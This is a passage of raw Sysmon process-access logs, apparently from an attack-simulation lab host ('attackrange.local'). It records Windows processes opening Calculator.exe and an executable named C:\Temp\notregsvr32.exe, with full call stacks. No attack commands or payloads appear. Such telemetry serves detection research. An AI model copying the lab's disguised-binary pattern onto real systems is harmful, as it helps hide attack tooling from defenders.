Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 10341000x8000000000000000361615Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361614Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361613Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361612Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361611Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361610Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361609Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361608Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361607Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361606Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361605Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361604Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361603Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361602Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361601Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361600Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361599Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.179{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361598Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361597Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361596Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361595Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361594Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-2a44-6013-1100-000000001100}11161040C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361593Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 